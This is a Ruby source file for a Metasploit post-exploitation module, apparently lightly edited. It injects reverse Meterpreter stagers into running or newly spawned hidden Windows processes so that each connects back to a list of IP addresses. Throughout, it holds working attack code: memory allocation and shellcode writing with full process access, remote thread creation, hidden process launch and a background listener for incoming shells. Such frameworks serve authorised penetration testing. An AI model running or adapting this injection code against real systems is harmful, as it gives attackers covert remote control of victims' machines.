##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
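# Post module: injects a reverse Meterpreter stager into one or more Windows
# processes, one stager per entry of IPLIST. Each IP is paired with the PID at
# the same position of PIDLIST; positions without a PID get a freshly started
# PROCESSNAME process instead. Per-process failures are reported, not raised.
#
# Changes against the original: the PROCESSNAME option description was the
# placeholder word 'Description'; the start_proc log line named notepad.exe
# regardless of the configured process; two dead `nil` assignments and two
# redundant explicit returns were dropped. Runtime behaviour is otherwise the same.
class MetasploitModule < Msf::Post
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Manage Inject in Memory Multiple Payloads',
        'Description' => %q{
          This module will inject into several processes a given
          payload and connect to a given list of IP addresses.
          The module works with a given lists of IP addresses and
          process IDs if no PID is given it will start the given
          process in the advanced options and inject the selected
          payload into the memory of the created module.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Carlos Perez <carlos_perez[at]darkoperator.com>',
          'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>' # added multiple payload support
        ],
        'Platform' => [ 'win' ],
        'SessionTypes' => ['meterpreter'],
        'Compat' => {
          'Meterpreter' => {
            # The exact set of stdapi calls inject/start_proc rely on.
            'Commands' => %w[
              stdapi_sys_process_attach
              stdapi_sys_process_execute
              stdapi_sys_process_memory_allocate
              stdapi_sys_process_memory_write
              stdapi_sys_process_thread_create
            ]
          }
        },
        'Notes' => {
          # Injecting into an existing PID can take that process down.
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('PAYLOAD', [false, 'Payload to inject in to process memory', 'windows/meterpreter/reverse_tcp']),
        OptInt.new('LPORT', [false, 'Port number for the payload LPORT variable.', 4444]),
        # Required; defaults to the local address that would route to 1.2.3.4.
        OptString.new('IPLIST', [true, 'List of semicolon separated IP list.', Rex::Socket.source_address('1.2.3.4')]),
        # Optional; an empty list means every target gets a new PROCESSNAME process.
        OptString.new('PIDLIST', [false, 'List of semicolon separated PID list.', '']),
        OptBool.new('HANDLER', [false, 'Start new exploit/multi/handler job on local box.', false]),
        # Number of passes over the IP/PID pairs.
        OptInt.new('AMOUNT', [false, 'Select the amount of shells you want to spawn.', 1])
      ]
    )

    register_advanced_options(
      [
        # Used only when an IPLIST entry has no matching PIDLIST entry.
        OptString.new('PROCESSNAME', [false, 'Process to start and inject into when no PID is given for an IP.', 'notepad.exe'])
      ]
    )
  end

  # Entry point. Validates the session, optionally starts a local handler, then
  # walks the IP/PID pairs AMOUNT times, injecting one stager per pair.
  def run
    # Native process memory/thread calls are only available on x86/x64 Windows Meterpreter.
    unless session.platform == 'windows' && [ARCH_X64, ARCH_X86].include?(session.arch)
      print_error('This module requires native Windows meterpreter functions not compatible with the selected session')
      return
    end

    # sysinfo can be nil on some sessions; fall back to running `hostname`.
    hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
    print_status("Running module against #{hostname} (#{session.session_host})")

    if datastore['HANDLER']
      create_multi_handler(datastore['PAYLOAD'], datastore['LPORT'])
    end

    # Both lists are ';' separated; String#split drops trailing empty fields,
    # so the default PIDLIST of '' yields an empty array.
    multi_ip = datastore['IPLIST'].split(';')
    multi_pid = datastore['PIDLIST'].split(';')

    datastore['AMOUNT'].times do # iterate through number of shells
      # zip pairs each IP with the PID at the same index; when PIDLIST is
      # shorter than IPLIST the PID side is nil and a new process is started.
      multi_ip.zip(multi_pid).each do |target_ip, target_pid|
        payload = create_payload(datastore['PAYLOAD'], target_ip, datastore['LPORT'])
        if target_pid
          inject(target_pid, payload)
        else
          # if no PID we create a process to host the Meterpreter session
          pid_num = start_proc(datastore['PROCESSNAME'])
          inject(pid_num, payload)
        end
        # select with no descriptors acts as a 5 second pause between injections.
        select(nil, nil, nil, 5)
      end
    end
  end

  # Function for injecting payload in to a given PID
  #-------------------------------------------------------------------------------
  # @param target_pid [String, Integer] PID (strings come straight from PIDLIST, hence to_i)
  # @param payload_to_inject [Msf::Payload] payload whose #generate output is written
  # @return [nil] errors for a single PID are printed and swallowed so the
  #   remaining pairs in run are still processed
  def inject(target_pid, payload_to_inject)
    print_status("Injecting meterpreter into process ID #{target_pid}")

    host_process = session.sys.process.open(target_pid.to_i, PROCESS_ALL_ACCESS)
    raw = payload_to_inject.generate
    # NOTE(review): this adds (length % 1024) rather than rounding up to a 1024
    # boundary; kept as in the original since allocate has accepted it so far.
    mem = host_process.memory.allocate(raw.length + (raw.length % 1024))

    print_status("Allocated memory at address #{'0x%.8x' % mem}, for #{raw.length} byte stager")
    print_status('Writing the stager into memory...')
    host_process.memory.write(mem, raw)
    host_process.thread.create(mem, 0)
    print_good("Successfully injected Meterpreter into process: #{target_pid}")
  rescue StandardError => e
    # Best effort per PID: report and move on (see Notes/Stability above).
    print_error("Failed to inject payload into #{target_pid}!")
    print_error(e.message)
  end

  # Function for Creation of Connection Handler
  #-------------------------------------------------------------------------------
  # Starts exploit/multi/handler as a background job on the attacker's framework.
  # @param payload_to_inject [String] payload reference, e.g. the PAYLOAD option
  # @param rport [Integer] LPORT the handler listens on
  # @param rhost [String] LHOST for the handler; the default '0.0.0.0' binds
  #   every local interface, so narrow it if the box is multi-homed
  def create_multi_handler(payload_to_inject, rport, rhost = '0.0.0.0')
    print_status("Starting connection handler at port #{rport} for #{payload_to_inject}")
    mul = client.framework.exploits.create('multi/handler')
    mul.datastore['WORKSPACE'] = session.workspace
    mul.datastore['PAYLOAD'] = payload_to_inject
    mul.datastore['LHOST'] = rhost
    mul.datastore['LPORT'] = rport
    mul.datastore['EXITFUNC'] = 'process'
    # Keep the job alive after the first session so every injected stager can connect back.
    mul.datastore['ExitOnSession'] = false

    mul.exploit_simple(
      'Payload' => mul.datastore['PAYLOAD'],
      'RunAsJob' => true
    )
    print_good('exploit/multi/handler started!')
  end

  # Function for Creating the Payload
  #-------------------------------------------------------------------------------
  # @param payload_type [String] payload reference passed to the payload factory
  # @param lhost [String] callback address for this stager
  # @param lport [Integer] callback port for this stager
  # @return [Msf::Payload] configured payload instance (not yet generated)
  def create_payload(payload_type, lhost, lport)
    print_status("Creating a reverse meterpreter stager: LHOST=#{lhost} LPORT=#{lport}")
    pay = client.framework.payloads.create(payload_type)
    pay.datastore['LHOST'] = lhost
    pay.datastore['LPORT'] = lport
    pay
  end

  # Function starting a host process (PROCESSNAME, notepad.exe by default)
  #-------------------------------------------------------------------------------
  # @param proc_name [String] executable to launch on the target, hidden
  # @return [Integer] PID of the newly created process
  def start_proc(proc_name)
    print_good("Starting #{proc_name} to house Meterpreter Session.")
    proc = client.sys.process.execute(proc_name, nil, { 'Hidden' => true })
    print_good("Process created with pid #{proc.pid}")
    proc.pid
  end
end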